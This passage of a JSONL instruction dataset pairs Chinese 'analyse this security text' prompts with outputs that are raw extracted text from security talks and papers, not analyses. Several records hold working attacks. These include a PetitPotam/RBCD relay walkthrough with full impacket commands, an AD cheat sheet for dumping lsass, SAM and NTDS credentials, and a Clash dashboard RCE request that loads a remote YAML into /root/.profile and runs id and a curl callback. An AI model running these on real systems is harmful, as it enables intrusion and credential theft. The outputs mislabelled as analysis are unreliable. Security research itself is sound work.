DVI-D, S-video, and LCD output  RS-232, webcam, audio, and microSD Beagleboard-xM BeagleBone Black (aka Raspberry Pi killer) I know at least one of you will ask...  Why not Raspberry Pi?  Not as powerful  Doesn't run Ubuntu (ARM6 not supported)  Not truly open (Broadcom won't release info)  Not as mature  Cost savings for full-featured platform are slight  Limited availability (especially in USA) Selecting a Base OS  Angstrom comes in the box  Optimized for hardware  Nice package management  Poor repository support for our purposes  Ubuntu is available  Backtrack is based on Ubuntu  Ubuntu is very popular  Good repository and community support Building a Base Device  Upgrade to 16GB microSD (8GB would work, 2GB on BBB way too small)  Download an image for microSD card  Canonical image or  Robert C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPetitPotam配合基于资源委派的横向技巧 原理使用PetitPotam将目标主机的身份认证中继到dc的ldap服务配置资源委派然后使用资源 委派获取目标主机权限 当微软修复CVE-2019-1040的时候顺便修了smb中继到ldap 但是我们还能通过http中继到ldap但前提条件是目标打开Webclient服务server默认不安装 win7win10默认安装但是需要手动打开服务 条件 域账户一个 目标主机需要打开Webclient服务 细节 PetitPotam可以发起http请求然后将http中继到ldap http中继需要使用可信域名域内dns即为可信域名 环境 DC192.168.60.128 目标主机192.168.60.133WIN7 攻击者192.168.60.130ubuntu start 假设已经有了一个域普通用户账户目标win7开启webclient服务 1.用已知域普通用户添加机器用户rbcd addcomputer.py sec.local/nortest:p@ssw0rd -method SAMR -computer-name rbcd - computer-pass Password123 -dc-host Ads.sec.local -dc-ip 192.168.60.128 -debug 2.用已知域普通用户添加DNS解析到ubuntu 3.使用PetitPotam中继http请求 4.使用资源委派拿目标主机的票据 Invoke-DNSUpdate -DNSName ubuntu -DNSData 192.168.60.130 这里是因为没找到远程添加dns的工具直接上域机器加DNS记录实际攻击场景中控域内任意主机加 DNSor 远程添加DNS记录这里是测试偷懒 python3 PetitPotam.py -d sec.local -u nortest -p p@ssw0rd ubuntu@80/ubuntu.sec.local 192.168.60.133 sudo ntlmrelayx.py -t ldap://192.168.60.128 --delegate-access --escalate-user rbcd$ --no-dump -smb2support getST.py sec.local/rbcd$:Password123 -dc-ip 192.168.60.128 -spn cifs/WIN7.sec.local -impersonate administrator 5.导入票据并使用wmiexec执行命令获取权限 export KRB5CCNAME=administrator.ccache wmiexec.py -dc-ip 192.168.60.128 -k -no-pass WIN7.sec.local whoami", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to Hack Your Mini Cooper: Reverse Engineering CAN Messages on Passenger Automobiles Jason Staggs University of Tulsa Institute for Information Security Crash Reconstruction Research Consortium jason-staggs@utulsa.edu ABSTRACT With the advent of modern vehicular technology, the computerized components of passenger vehicles have become increasingly interconnected to facilitate automotive efficiency, driving experience, and emissions control. Controller Area Networks (CANs) are well suited for intercommunications among these components, called electronic control units (ECUs). ECUs are used to communicate with critical control systems on automobiles including transmissions, braking, body control, and even vehicle infotainment systems. CAN networks are designed for high speed, reliable communications between ECU components operating in harsh environments. Unfortunately, the security of the underlying protocol is dubious at best. The Bosch CAN standard does not include inherent security mechanisms for authentication and validation of messages sent to various ECUs over a CAN network. Currently the only data security methods for CAN networks on passenger vehicles are the use of proprietary CAN message IDs and a physical boundary between the CAN bus and the outside world. This presents a serious security issue, because anyone with physical access to the vehicle's data bus could generate spoofed CAN traffic destined for various ECUs, some of which could be responsible for critical vehicle operations such as the braking system or engine control unit. To prevent this, manufactures of passenger vehicles do not publish the proprietary CAN message IDs for various components on the vehicle network. However, proprietary message IDs can be identified through a reverse engineering process. This paper identifies techniques for reverse engineering CAN messages on passenger vehicles, demonstrating the ease with which an attacker could manipulate CAN-enabled components of an automobil", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1.无凭证情况下 网络扫描 漏洞快速探测 扫描后可以去先用已知漏洞打 提权 低权限可以做的事情 拥有本地管理员权限 cme smb <ip_range> # SMB 扫描存活主机 nmap -sP -p <ip> # ping 扫描 nmap -PN -sV --top-ports 50 --open <ip> # 快速扫描 nmap -PN --script smb-vuln* -p139,445 <ip> # 检测 SMB 漏洞 nmap -PN -sC -sV <ip> # 经典扫描 nmap -PN -sC -sV -p- <ip> # 全扫描 nmap -sU -sC -sV <ip> # UDP 扫描 java rmi exploit/multi/misc/java_rmi_server ms17-010exploit/windows/smb/ms17_010_eternalblue tomcatauxiliary/scanner/http/tomcat_enum jboss managerexploit/multi/http/tomcat_mgr_deploy Java反序列化漏洞测试ysoserial 查找产品的CVE漏洞searchsploit MS14-025 searchsploit findstr /S /I cpassword \\\\<FQDN>\\sysvol\\<FQDN>\\policies\\*.xml 爆破数据库连接use admin/mssql/mssql_enum_sql_logins proxylogon proxyshell winpeas.exe 查找内容有 password 的文件findstr /si 'password' *.txt *.xml *.docx Juicy Potato / Lovely Potato PrintSpoofer RoguePotato SMBGhost CVE-2020-0796 CVE-2021-36934 (HiveNightmare/SeriousSAM) ...... 获取密码 绕过LSA防护策略读取密码 token窃取 之前粗略分析过 token Token窃取那些事 (0range-x.github.io) 查看本地存储的所有密码 卷影拷贝获取域控所有hash procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz \"privilege::debug\" \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords\" \"exit\" mimikatz \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\" \"lsadump::sam\" \"exit\" hashdump: post/windows/gather/smart_hashdump cme smb <ip_range> -u <user> -p <password> -M lsassy cme smb <ip_range> -u <user> -p '<password>' --sam / --lsa / --ntds PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp mimikatz \"!+\" \"!processprotect /process:lsass.exe /remove\" \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\" \"!processprotect /process:lsass.exe\" \"!-\" #with mimidriver.sys .\\incognito.exe list_tokens -u .\\incognito.exe execute -c \"<domain>\\<user>\" powershell.exe use incognito impersonate_token <domain>\\\\<user> lazagne.exe all diskshadow list shadows all mklink /d c:\\shadowcopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\ [CVE-2020-1472的分析与复现 (0range-x.github.io)](https://0range-x.github.io/2021/11/22/CVE- 2020-1472/#vssadmin卷影拷贝) dpapi解密 2.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTAKING WINDOWS 10 KERNEL EXPLOITATION TO THE NEXT LEVEL  LEVERAING WRITE- WHAT-WHERE VULNERABILITIES IN CREATORS UPDATE Whoami  Morten Schenk  Security Advisor, Improsec ApS  Twitter - @blomster81  Blog: https://improsec.com/blog/  GitHub: https://github.com/MortenSchenk  What to expect from this talk  Windows 10 Kernel Exploitation on Creators Update from Low Integrity  Lots of hex, C and memes  0-days! Agenda  Brief look at Kernel Exploitation history  New Windows 10 Mitigations  Arbitrary Kernel Read/Write Primitive  KASLR information leak  De-randomizing Page Table Entries  Dynamic Function Location  Executable Kernel Memory Allocation Exploitation Concept  Write-What-Where  Vulnerability class  Best case  Write controlled value at controlled address  Common case  Write not controlled value at controlled address  Leverage to obtain kernel-mode code execution  Must know where and perhaps what  Techniques presented may be used for other vulnerability classes as well Kernel Exploitation History Brief Look at Kernel Exploitation History Windows 7  Executable NonPagedPool was the default  Kernel information leaks were available with NtQuerySystemInformation  Overwrite HalDispatchTable function table with NonPagedPool address  Execute User-mode memory from Kernel-mode Brief Look at Kernel Exploitation History Windows 8.1 and Windows 10  Windows 8.1 and Windows 10 before Anniversary Edition.  Kernel information leaks with APIs blocked from Low Integrity.  NonPagedPoolNx is the new standard.  Supervisor Mode Execution Prevention is introduced.  Kernel-mode read / write primitive is needed.  GDI bitmap primitive.  tagWND primitive. Bitmap Primitive  Information leak of Bitmap through GdiSharedHandleTable  Overwrite size of Bitmap using Write-What-Where  Consecutive Bitmaps can create a primitive  SetBitmapBits overwrites data pointer of the following Bitmap  GetBitmapBits reads arbritrary kernel memory  SetBitmapBits writes arbritrary kernel memory tagWND primitive  Info", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGoto Payload for Windows  DLL, compiled C  Usually injected into process memory  Enhanced CMD shell  Provides basic post- exploitation API  Often run with SYSTEM Privs  Can be migrated into a users process  Railgun is an extension to the Meterpreter STDAPI  Allows Arbitrary Loading of DLLs  As long as you know the path of the DLL, you can access its functions  Since Windows API DLLs are always at known paths, we can always load them  Dynamic access to the entirety of the Windows API on the system  By calling APIs from user processes, we can impersonate users  Anything becomes possible  June 2010  Railgun submitted to Metasploit by Patrick HVE  Sept 2010  64bit support added by Stephen Fewer  Feb 2011  Chao-mu takes over Railgun support, resumes new feature work  Fall 2011  Chao-mu disappears  Aug 2012  YOU start contributing to Railgun  Dec 2012  Mayans predict Railgun-related Apocalypse?  LoadLibrary function opens a Handle to the DLL  GetProcAddress maps a function pointer to the specified function  Memread and Memwrite functions for manipulating memory space  Ruby code lives in lib/rex/post/meterpreter/exten sions/stdapi/railgun  User/module writer defines the DLL and the needed functions  Functions are then avilable as methods  Can define at runtime or use definition files A look at Railgun Definitions def self.create_dll(dll_path = 'advapi32') dll = DLL.new(dll_path, ApiConstants.manager) dll.add_function('CredEnumerateA', 'BOOL', [ ['PCHAR', 'Filter', 'in'], ['DWORD', 'Flags', 'in'], ['PDWORD', 'Count', 'out'], ['PBLOB', 'Credentials', 'out']]) 1.Function Name 2.Function Return Type 3.Array of Parameters 1. Param type 2. Param Name 3. IN/OUT/INOUT Parameter  Railgun knows about Windows constants  They are defined in api_constants.rb in the railgun folder  Easy to add new constants as needed there  If it quacks like a duck  Pass as a Fixnum or Bignum  String representation of constants can also be passed in  Pointer to a DWORD  Pass a Fixnum  Pass the Content o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n快手业务安全 敌众我寡的歼灭战 讲师介绍 姓名陈成  2014.2 中国科学院 信息安全 博士  2018.3 快手-风控业务安全负责人 目录 01 初识黑灰产 02 走进风控 03 核心打法 一初识黑灰产 黑色产业链 人数盘大 敌暗我明 n 善于伪装反侦察意 识强 产业链逐渐完善 n 集团化规模化智 能化 n 百万从业人员 n 年产值达千亿 灰色产业链 从肉鸡到真鸡 Ø 真人真机 Ø 平台化裂变化 Ø 多场景多行业 14 15 37 52 184 692 1542 2014年 2015年 2016年 2017年 2018年 2019年 2020年 2014年-2020年真人作弊APP开发者数量发展走势 短视频下的黑灰产帐号安全 黑产 盗号扫号批量注册 灰产 养号租号 短视频下的黑灰产引流 黑产垃圾内容 灰产经营人设诈骗 短视频下的黑灰产流量作弊 灰产 黑产 短视频下的黑灰产活动薅羊毛 黑产改机分身群控 灰产互助众包 黑灰产特点 成本低危害大 对抗性强 前中后台形成产业链 灰产 隐蔽难识别 难处置 背后往往是黑产 黑产 二走近风控 黑灰产治理的特点持续对抗过程 区 别 于A I 算 法 区 别 社 区 规 则 区 别 漏 洞 挖 掘 黑灰产治理的难点平衡安全和体验 保安全同时保体验 不合适的风控手段得不偿失 l 直接影响用户体验 l 甚至有舆情风险 黑灰产治理的难点业务沟通  漏了多少  误伤了多少 幸存者偏差 来自业务的灵魂拷问 出了问题才来找风控 对接困难低效 黑灰产治理的难点木桶效应 处于业务下游业务感知弱 战线长业务复杂 三核心打法 业务架构中台化 核心打法 策略对抗 应对挑战 强对抗 保体验 业务沟通难 感知弱 风险战线广 1 2 3 4 5 提出核心解法 产品方案 业务联动 基础能力 情报体系 策略对抗平台化 低门槛高效率上线无需写代码 接入分析上线处置监控一条龙服务 风险预警熔断保护 界面友好操作顺畅 平台化 策略对抗从人工到半自动化 策略对抗无监督和半监督的广泛应用 异构图关系中的作弊团伙 基础特征联合概率分布 业务联动产品手段 奖励延时发放 风险提示 专属文案 业务联动统一收口联防联控 同中台对接减少风控对接成本 各场景各业务能力打通起到联防 联控效果 业务联动风控流程 基础能力建设  端安全  验证&处置中心 情报体系 Ø 通过外部发现业务风险 Ø 研究黑灰产行为组织专题报告 Ø 发现线索业务评估 情报 收集 情报平台 治理效果内部数据 活动资损率 客诉率 <0.2% <2次/十万 减少资损 百万元/天 恶意曝光率 客诉率 <0.01% <1次/百万 拦截请求 十万次/天 活动反作弊 恶意引流 治理效果外部评价", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmysqlshow === 显示MySQL中数据库相关信息 ## 补充说明 **mysqlshow命令** 用于显示mysql服务器中数据库表和列表信息 ### 语法 ```shell mysqlshow(选项)(参数) ``` ### 选项 ```shell -hMySQL服务器的ip地址或主机名 -u连接MySQL服务器的用户名 -p连接MySQL服务器的密码 --count显示每个数据表中数据的行数 -k显示数据表的索引 -t显示数据表的类型 -i显示数据表的额外信息 ``` ### 参数 数据库信息指定要显示的数据库信息可以是一个数据库名或者是数据库名和表名或者是数据库名表名和列名", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeb Privacy and Adobe Local Shared Objects (and other things you should know) Clinton Wong clinton.defcon@gmail.com Defcon 16, August 2008 These slides are obsolete  This is the presentaKon included on the Defcon 16 CD.  Check the Defcon web site for the latest version of this talk. This Talk Isnt About Anything New According to hPp://en.wikipedia.org/wiki/Local_Shared_Object: Flash Player [] does not ask the user's permission to store data permanently. This may consKtute a collecKon of cookielike data that may include not only usertracking informaKon but any personal data that the user has entered in any Flashenabled applicaKon Public Service Announcement  Things you should know but probably dont.  How do I manage LSOs?  What else should I do differently? HTTP Cookies Are Well Understood Its 2008, everyone knows about cookies. IETF standards:  HTTP/1.1 : RFC 2616  HTTP Cookies: RFC 2109 Lets take a look at that Web Browser Sends This GET hPp://www.google.com/ HTTP/1.1 UserAgent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; enus) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 AcceptEncoding: gzip, deflate Accept: text/xml,applicaKon/xml,applicaKon/xhtml+xml,text/ html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 AcceptLanguage: enus Host: www.google.com ConnecKon: close Web Server Replies With This HTTP/1.0 200 OK CacheControl: private, maxage=0 Date: Thu, 26 Jun 2008 04:18:25 GMT ContentType: text/html; charset=UTF8 SetCookie: PREF=ID=a2bce[]  keep this in mind for next slide domain=.google.com ContentEncoding: gzip Server: gws ContentLength: 2654  Web Browser Subsequently Sends This GET hPp://www.google.com/favicon.ico HTTP/1.1 UserAgent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; enus) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 Referer: hPp://www.google.com/ Accept: */* AcceptLanguage: enus AcceptEncoding: gzip, deflate Cookie: PREF=ID=a2bce[]  value that server gave us in previous slide Host: www.google.com Conn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLateral Movement Remote Desktop Protocol Description RDPis routinely used by your administrators, help desk, or others it provides an attractive attack vector for adversaries who are trying to blend in with standard network activity. Once on a client system, the attacker can simply leverage the built in Microsoft tools to allow for remote access to other systems using RDP and valid credentials An attacker can use the Microsoft Remote Desktop Connection (mstsc.exe) tool to access a victim system. While you hopefully are not exposing the default port 3389 to the Internet, port forwarding set up as a pivot on other, Internet accessible systems does make this possible from either external or internal hosts Indicators Windows Event logs 4624 The logon event will show either a Type 10 or Type 3 when RDP is used, depending on the versions of Windows used and their specific configuration 4778 This event is logged when a session is reconnected to a Windows station. This can occur locally when the user context is switched via fast user switching. It can also occur when a session is reconnected over RDP. To differentiate between RDP versus local session switching, look at the Session Name field within the event description. If local, the field will contain Console, and if remote, it will begin with RDP. For RDP sessions, the remote host information will be in the Network Information section of the event description 4779 This event is logged when a session is disconnected. This can occur locally when the user context is switched via fast user switching. It can also occur when a session is reconnected over RDP. A full logoff from an RDP session is logged with Event ID 4637 or 4647 as mentioned earlier. To differentiate between RDP versus local session switching, look at the Session Name field within the event description. If local, the field will contain Console, and if remote, it will begin with RDP. For RDP sessions, the remote host information will be in the Network Information sectio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMobile privacy: Tor on the iPhone and other unusual devices Marco Bonetti <mbonetti@cutaway.it> May 2, 2010 Abstract Tor is a software project that helps you defend against traffic analy- sis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state se- curity. Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. Unfortunately, with the new features of HTML5 and browser built- in geolocation being pushed into the Web2.0 world and on mobile phones and browser, its becoming harder and harder to keep the users privacy safe. This paper will describe the problems which are arising around the use of these new technologies and how they can be (ab)used to attack Tor users. It will also describe where the development is going to protect mobile phone users privacy and let them survive their own devices. i 1 Introduction Tor is becoming more and more popular, its no surprise that TorProject.org launched this year the Help us reach 5000 relay in 2010! drive [1] [2]. Unfor- tunately, such growth is not always followed by adoption of secure browsing behavior and new privacy exploit techniques are always in the development. If this is not enough, with the rapid growth and diffusion of mobile devices, its becoming really difficult for the end user to protect his very own privacy. Section 2 will describe the current scenario about secure communication available for mobile phones. Section 3 will talk about the current availability of Tor clients for mobile phones and the following chapters will go into details: Section 4 will describe the working port for the Chumby One multimedia alarm clock, Section 5 will talk about the Nokia N900 port, Section 6 will introduce the Androi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTechnical Service Bulletin: FXR-13 Modifying Motorola Maxtrac VHF 136  174 MHz for Amateur Radio Applications in the 222  225 MHz Band A FluX Research project in several phases Release Date: 07-01-2010 Last Update: v1.0 07-01-2010 By: Matt Krick, K3MK matt@kgmn.net Radio Model #: Motorola Maxtrac 100 Motorola Maxtrac 300 Warning: Please be aware that this document is currently a work in progress which may contain several omissions and or typographical errors, continue reading at your own risk. Background: This document expands on the original work done by Glenn Hochwalt, Jr., W8AK to convert the VHF Maxtrac into the 222 MHz band. Special thanks to Jeff Ackerman, KG6UYZ for providing the radios for experimentation. Phase 0: Preparations Make sure the radio to be converted is in good working order on its original frequencies before attempting conversion to 222 MHz Amateur Radio use. Phase 1: Operating Frequency Reprogramming I recommend Maxtrac Lab RSS R07.02.00A be used. Earlier versions were found to work fine with some versions of the Maxtrac, but would not read others. Programming the radio is as normal how ever when entering the frequency it is necessary to enter the numbers with the shift key held down and all digit places must be entered. Example: 223.5 MHZ is entered as @@#.%)))) Phase 2: VCO Remove the RF board from the chassis of the radio using a Torx T-10 driver. It will be necessary to use a high heat broad tip such as a Weller 800 degree PTC to remove the coils and their housings from the board. This is best accomplished by melting the solder joints and slowly rocking the entire coil out of the board. Hole clean up is best done with the aid of a stainless steel dental pick, solder wick and solder sucker. Remove L213, TX VCO Adjustable Coil (Yellow), and set it aside. Remove L202, RX VCO Adjustable Coil (Orange), and install in L213 position. Remove L215, TX VCO Fixed Coil (Yellow), and set it aside. Remove L204, RX VCO Fixed Coil (Orange) and install in ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 clash dashboard rce 利限制 jj.yaml payload: Bash 复制代码 1.配置中external-controller监听0.0.0.0(很多订阅地址默认配置即为0.0.0.0) 2.linux环境 3.命令执需管理员登录服务器才会触发 1 2 3 Bash 复制代码 id>/tmp/1.txt: test whoami: curl clash.jj.dnslog.cn proxies: - name: 'jjproxy' type: ssr server: jjproxy.com port: 0 cipher: chacha20-ietf password: jjproxy.com protocol: auth_aes128_md5 protocol-param: '0:jjproxy.com' obfs: http_simple obfs-param: jjproxy.com udp: true 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 2 Bash 复制代码 PUT /configs?force=true HTTP/1.1 Host: [TARGET]:9090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 841 {\"rce\":\"reload\",\"payload\":\"port: 7890\\nsocks-port: 7891\\nredir-port: 7892\\nallow-lan: false\\nmode: rule\\nlog-level: silent\\nexternal- controller: '0.0.0.0:9090'\\nsecret: ''\\ndns:\\n enable: true\\n ipv6: false\\n listen: '0.0.0.0:53'\\n enhanced-mode: fake-ip\\n fake-ip-range: 198.18.0.1/16\\n nameserver:\\n - 'https://223.5.5.5/dns-query'\\n - 'https://doh.pub/dns-query'\\n - 'tls://dns.rubyfish.cn:853'\\n fallback:\\n - 'tls://1.0.0.1:853'\\n - 'tls://8.8.4.4:853'\\n - 'https://doh.opendns.com/dns-query'\\n fallback-filter:\\n geoip: true\\n ipcidr:\\n - 240.0.0.0/4\\nproxy-providers:\\n provider1:\\n type: http\\n url: 'http://[REPLACE]/jj.yaml'\\n interval: 3600\\n path: '/root/.profile'\\n healthcheck:\\n enable: true\\n interval: 3600\\n lazy: true\\n url: \\\"http://jjproxy.com\\\"\"} 1 2 3 4 5 6 7 8 9 10 11", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Securinets CTF Quals 2018 Team: shalom, akrasuski1, psrok1, nazywam, sasza ### Table of contents * [The worst RSA joke (crypto)](crypto_worst_rsa) * [Looser (crypto)](crypto_looser) * [Improve the quality (crypto)](crypto_quality) * [Notice me (forensics)](for_notice) * [Magic test (web)](web_magic) * [Special (pwn)](pwn_special) * [Tic Tac Toe (web/misc)](web_tictactoe) * [No mercy (pwn)](pwn_no_mercy) * [Lone author (forenics)](for_lone)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom ROOT to SPECIAL PWNING IBM Mainframes Soldier of Fortran @mainframed767 DISCLAIMER! All research was done under personal time. I am not here in the name of, or on behalf of, my employer. Any views expressed in this talk are my own and not those of my employer. This talk discusses work performed in my spare time generally screwing around with mainframes and thinking 'what if this still works...' @mainframed767 PCI Security Expert Mainframe Security Guru ISO 27002 & PCI Certifier Whats NETSTAT? - Our Horrible Consultant Spoken ?Question? PLAIN TXT 53% SSL 47% INTERNET MAINFRAMES z/OS? WTF  Most popular mainframe OS  Version 2.1 out now! Legacy my ass! @mainframed767 z/OS Demo  Lets take a look at this thing  Itll all make sense @mainframed767 @mainframed767 Ettercap Demo @mainframed767 Missed it @mainframed767 CGI-Bin in tyool 2014  REXX / SH still used  Injection simple, if you know TSO commands @mainframed767 @mainframed767 CENSORED( CENSORED( @mainframed767 Only FTP?  No Problem!  FTP lets you run JCL (JCL = Script)  Command: SITE FILE=JES @mainframed767 Access Granted  Now we have access  FTP Script Account  Ettercap Now what? @mainframed767 Escalate!  Lets escalate our privilege  Connect with telnet/ssh/3270  Use local priv escalation @mainframed767 Getroot.rx  rexx script  Leverages CVE-2012-5951: Unspecified vulnerability in IBM Tivoli NetView 1.4, 5.1 through 5.4, and 6.1 on z/OS allows local users to gain privileges by leveraging access to the normal Unix System Services (USS) security level. Tsk tsk  IBM not really being honest here  Works on any setuid REXX script! @mainframed767 @mainframed767 DEMO @mainframed767 DEMO THANKS  Swedish Black Hat community  Oliver Lavery  GDS Security  Logica Breach Investigation Files @mainframed767 Keep ACCESS  Get a copy of the RACF database  John the Ripper racf2john racf.db john racf_hashes @mainframed767 Steal  Use IRRDBU00 to convert RACF to flat file  Search for SPECIAL accounts  Login with a SPECIAL account @mai", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWarping Reality Creating and countering the next generation of Linux rootkits using eBPF Pat Hogan @PathToFile Overview  What are Linux kernel rootkits  Why writing and using rootkits is hard  How eBPF solves these problems and more  How to detect and prevent malicious eBPF usage @pathtofile What are kernel rootkits? Kernel Rootkits - Advantages  Attackers want to maintain access to compromised machines  Credentials change, vulnerabilities get patched, etc.  Hooking syscall table = visibility and control  See all network traffic  Hide files and processes  Create root processes @pathtofile Kernel Rootkits - Risks  Small bugs can cause major problems  Crashing the kernel means crashing the system  Any update to the kernel risks disaster  Some environments block arbitrary kernel modules (e.g. Amazon EKS) @pathtofile How about we add JavaScript-like capabilities to the Linux Kernel? - Thomas Graf, Isovalent, 2020 What is eBPF? eBPF  eBPF (extended Berkeley Packet Filtering)  Experienced rapid growth in last ~2 years  eBPF allows you to create programmable trace points in the kernel  Programs can be attached to:  Network Interfaces  Kernel functions  User mode functions  eBPF programs are guaranteed to be:  Safe  Efficient  Portable @pathtofile eBPF - Safe and Efficient  Programs typically written in C or Rust  Has variables, loops, conditionals  Can call a small number of helper functions  Compiled by LLVM or GCC into bpf bytecode  Architecture agnostic  Kernel version agnostic @pathtofile SEC(\"tp/syscalls/sys_enter_execve\") int handle_execve_enter(struct trace_event_raw_sys_enter *ctx) { char prog[TASK_COMM_LEN]; bpf_probe_read_user(&prog, sizeof(prog), ctx->args[0]); bpf_printk(\"Execve: %s\", prog); return 0; } int handle_execve_enter(struct trace_event_raw_sys_enter * ctx): ; bpf_probe_read_user(&c, sizeof(c), ctx->args[0]); 0: (79) r3 = *(u64 *)(r1 +16) 1: (bf) r6 = r10 2: (07) r6 += -16 ; bpf_probe_read_user(&c, sizeof(c), ctx->args[0]); 3: (bf) r1 = r6 4: (b7) r2 = 16 5: (85) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nREVERSE ENGINEERING 17 CARS IN UNDER 10 MINUTES BRENT STONE Disclaimer About This Talk and The Github Repo The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Air Force, the United States Army, the United States Department of Defense or the United States Government. The material publicly released on https://github.com/brent-stone/CAN_Reverse_Engineering/, up to and including commit ac0e55f on 26 March 2019, is declared a work of the U.S. Government and is not subject to copyright protection in the United States. APPROVED FOR PUBLIC RELEASE; DISTRIBUTION UNLIMITED Case Numbers: 88ABW-2019-0910, 88ABW-2019-0024 A B FLEXIBLE UNDETERMINABLE  Modify End Points  Modify Routing  No delivery guarantee  No timeliness guarantee n end points General Use Networks Meta Data Meta Data A B DETERMINABLE INFLEXIBLE  Delivery Guarantee  Timeliness Guarantee  Fixed End Points  Fixed Routing Control Networks C D E Meta Data Meta Data Lots of people helping others play with general use networks Automated Reverse Engineering of General Use Networks 1. P. Ducange, G. Mannara, F. Marcelloni, R. Pecori, and M. Vecchio, \"A novel approach for internet traffic classification based on multi-objective evolutionary fuzzy classiffiers,\" in 2017 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE), 2017, pp. 1-6. 2. J. Yuan, Z. Li, and R. Yuan, \"Information entropy based clustering method for unsupervised internet traffic classification,\" in IEEE International Conference on Communications (ICC), 2008, pp. 1588-1592. 3. C. Besiktas and H. A. Mantar, \"Real-Time Traffic Classiffication Based on Cosine Similarity Using Sub-application Vectors,\" in Proceedings of the Traffic Monitoring and Analysis 4th International Workshop, 2012, vol. 7189, pp. 89-92. 4. A. Trifilo, S. Burschka, and E. Biersack, \"Traffic to protocol reverse engineering,\" in IEEE Symposium on Computational Intelligence for Security and Defense Ap", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSeccubus Repeated vulnerability scans made easy for: Public release date: 18 March 2010 version: 1.0 author: Frank Breedijk status: Public D R A F T for Public release title Seccubus version 1.0 2 date 18 March 2010 PUBLIC author Frank Breedijk Table of contents 1 Introduction 3 1.1 What is a vulnerability scanner? 3 1.2 Why scan? 3 2 More scanning, more work? 5 2.1 How does Seccubus improve this? 5 2.2 What is the gain? 5 2.3 Case: Schuberg Philis 6 2.4 Seccubus vital statistics 6 3 Conclusion 7 4 About the author 8 D R A F T for Public release title Seccubus version 1.0 3 date 18 March 2010 PUBLIC author Frank Breedijk 1 Introduction During my work as security engineer at Schuberg Philis I repeatedly made use of vulnerability scanners like Nessus and OpenVAS. To me these scanners came across as real power tools unfortunately they are nowhere near perfect. Every scan results in a report, in one form or the other, with a large number of findings. Each of these findings will have to be investigated in order to determine if the finding is: 1. an issue 2. not an issue or 3. a false positive. These investigations take time and effort. Because of this involvement in time and effort, vulnerability scans are often conducted on an ad-hoc basis, e.g. before go-life of an infrastructure or after a major change. However the dynamics of IT, where change is the only constant, made me want to regularly perform vulnerability scans. Obviously with the intention to spend as little time and effort as possible. This challenge has pushed me to write Seccubus, a tool to schedule vulnerability scans and process their results more easily. 1.1 What is a vulnerability scanner? In the introduction of this paper I regularly used the term vulnerability scanner, but just to be clear; what do I mean by vulnerability scanner? A vulnerability scanner is a software program that aims to find vulnerabilities in software or an infrastructure, often by simulating an attack. Nessus and OpenVAS are well ", "category": "text_analysis", "source": "security_papers"}
